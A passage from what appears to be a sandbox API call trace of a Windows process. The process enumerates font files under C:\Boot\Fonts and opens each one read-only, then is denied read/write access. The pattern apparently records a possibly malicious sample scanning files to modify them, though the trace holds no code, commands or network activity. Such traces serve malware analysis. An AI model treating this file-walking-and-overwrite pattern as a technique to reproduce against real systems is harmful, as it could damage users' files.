dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.840] GetFileType (hFile=0x418) returned 0x1 [0069.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.840] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.840] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.840] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.840] CloseHandle (hObject=0x418) returned 1 [0069.840] AreFileApisANSI () returned 1 [0069.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0069.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x536d0 [0069.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=29 | out: lpWideCharStr="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 29 [0069.841] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.841] GetLastError () returned 0x5 [0069.841] GetLastError () returned 0x5 [0069.841] SetLastError (dwErrCode=0x5) [0069.841] GetLastError () returned 0x5 [0069.841] SetLastError (dwErrCode=0x5) [0069.841] GetLastError () returned 0x5 [0069.841] SetLastError (dwErrCode=0x5) [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.841] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef95f141, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x26255, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0069.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0069.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0069.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0069.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0069.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.842] AreFileApisANSI () returned 1 [0069.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\msyh_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\msyh_boot.ttf", lpUsedDefaultChar=0x0) returned 28 [0069.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0069.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0069.842] AreFileApisANSI () returned 1 [0069.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0069.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78710 [0069.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x78710, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 28 [0069.842] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.842] GetFileType (hFile=0x418) returned 0x1 [0069.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78710 | out: hHeap=0x20000) returned 1 [0069.843] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.843] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.843] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.843] CloseHandle (hObject=0x418) returned 1 [0069.843] AreFileApisANSI () returned 1 [0069.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0069.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78590 [0069.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x78590, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 28 [0069.844] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.844] GetLastError () returned 0x5 [0069.844] GetLastError () returned 0x5 [0069.844] SetLastError (dwErrCode=0x5) [0069.844] GetLastError () returned 0x5 [0069.844] SetLastError (dwErrCode=0x5) [0069.844] GetLastError () returned 0x5 [0069.844] SetLastError (dwErrCode=0x5) [0069.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78590 | out: hHeap=0x20000) returned 1 [0069.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.844] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef96ef3e, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf3b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0069.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0069.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0069.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0069.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0069.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0069.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0069.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0069.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0069.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0069.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0069.845] AreFileApisANSI () returned 1 [0069.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\segmono_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\segmono_boot.ttf", lpUsedDefaultChar=0x0) returned 31 [0069.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0069.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0069.845] AreFileApisANSI () returned 1 [0069.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0069.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53640 [0069.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 31 [0069.846] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.846] GetFileType (hFile=0x418) returned 0x1 [0069.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.846] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.847] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.847] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.847] CloseHandle (hObject=0x418) returned 1 [0069.847] AreFileApisANSI () returned 1 [0069.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0069.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53838 [0069.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 31 [0069.847] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.847] GetLastError () returned 0x5 [0069.847] GetLastError () returned 0x5 [0069.847] SetLastError (dwErrCode=0x5) [0069.847] GetLastError () returned 0x5 [0069.847] SetLastError (dwErrCode=0x5) [0069.847] GetLastError () returned 0x5 [0069.848] SetLastError (dwErrCode=0x5) [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.848] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c0da69, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef97d9ab, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x14f66, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0069.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0069.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0069.849] AreFileApisANSI () returned 1 [0069.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\segoen_slboot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\segoen_slboot.ttf", lpUsedDefaultChar=0x0) returned 32 [0069.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0069.849] AreFileApisANSI () returned 1 [0069.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0069.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=32 | out: lpWideCharStr="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 32 [0069.849] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.849] GetFileType (hFile=0x418) returned 0x1 [0069.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.850] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.850] SetFilePointerEx (in: hFile=0x418, 